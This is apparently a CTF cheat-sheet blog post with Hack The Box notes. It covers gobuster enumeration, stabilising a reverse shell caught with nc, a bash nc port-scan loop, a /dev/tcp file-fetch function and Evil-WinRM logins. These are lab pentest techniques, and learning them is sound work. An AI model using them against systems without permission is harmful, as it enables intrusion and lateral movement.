1 minute read

ctf

Recon

Gobuster

Install:

apt-get install gobuster

Mode:

gobuster dns -d <target domain> -w <wordlist>
gobuster dir -u <target url> -w <wordlist>
gobuster vhost -u <target url> -w <wordlist>

File type:

gobuster dir -u <target url> -w <wordlist> -x .php

Ignore certificate errors:

gobuster dir -u <target url> -w <wordlist> -k

Specify cookie:

gobuster dir -u <target url> -w <wordlist> -c 'session=123456'

Shell

Upgrade

First job is to upgrade our terminal to something more useable:

Check if Python is available:

www-data@writer:/$ which python
which python
www-data@writer:/$ which python3
which python3
/usr/bin/python3

Spawn proper session:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Ctrl+Z to background then set stty:

tomcat@seal:/var/lib/tomcat9$ ^Z
zsh: suspended  nc -nlvp 1337
โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/htb/seal]
โ””โ”€# stty raw -echo; fg
[1]  + continued  nc -nlvp 1337

Sort terminal, check local first:

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/htb/writer]
โ””โ”€# stty size          
52 237

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/htb/writer]
โ””โ”€# echo $TERM                                                            
xterm-256color

Then set on box:

tomcat@seal:/var/lib/tomcat9$ export TERM=xterm
tomcat@seal:/var/lib/tomcat9$ stty rows 52 cols 237

Bash Port Enumeration

We can scan all ports like this:

i=1
max=65535
while [ $i -lt $max ]
do
    echo "Port: $i"
    nc -w 1 -v 172.17.0.1 $i </dev/null; echo $?
    true $(( i++ ))
done

Bash wget

function __wget() {
    read proto server path <<<$(echo ${1//// })
    DOC=/${path// //}
    HOST=${server//:*}
    PORT=${server//*:}
    [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
 
    exec 3<>/dev/tcp/${HOST}/$PORT
    echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
    (while read line; do
        [[ "$line" == $'\r' ]] && break
    done && cat) <&3
    exec 3>&-
}

Bash mkdir & cd

mkcdir ()
{
    mkdir -p -- "$1" &&
      cd -P -- "$1"
}

Look for active services

jennifer@admirertoo:~$ systemctl list-units --type=service
UNIT                               LOAD   ACTIVE SUB     DESCRIPTION                                                       
apache2.service                    loaded active running The Apache HTTP Server                                            
apache2@opencats.service           loaded active running The Apache HTTP Server                                            
apparmor.service                   loaded active exited  Load AppArmor profiles                                            
console-setup.service              loaded active exited  Set console font and keymap                                       
cron.service                       loaded active running Regular background program processing daemon                      
dbus.service                       loaded active running D-Bus System Message Bus                                          
fail2ban.service                   loaded active running Fail2Ban Service                                                  
getty@tty1.service                 loaded active running Getty on tty1                                                     
hbase.service                      loaded active running HBase                                                             
ifup@eth0.service                  loaded active exited  ifup for eth0

Evil-WinRM

Standard connection with user and password, also use SSL:

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/htb/timelapse]
โ””โ”€# evil-winrm -i 10.10.11.152 -u user123 -p 'password123' -S

Connect using certificate and private key, no user or password needed, use SSL:

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/htb/timelapse]
โ””โ”€# evil-winrm -i 10.10.11.152 -c ./pfx.crt -k ./priv.key -p -u -S 

Categories:

Updated:

Comments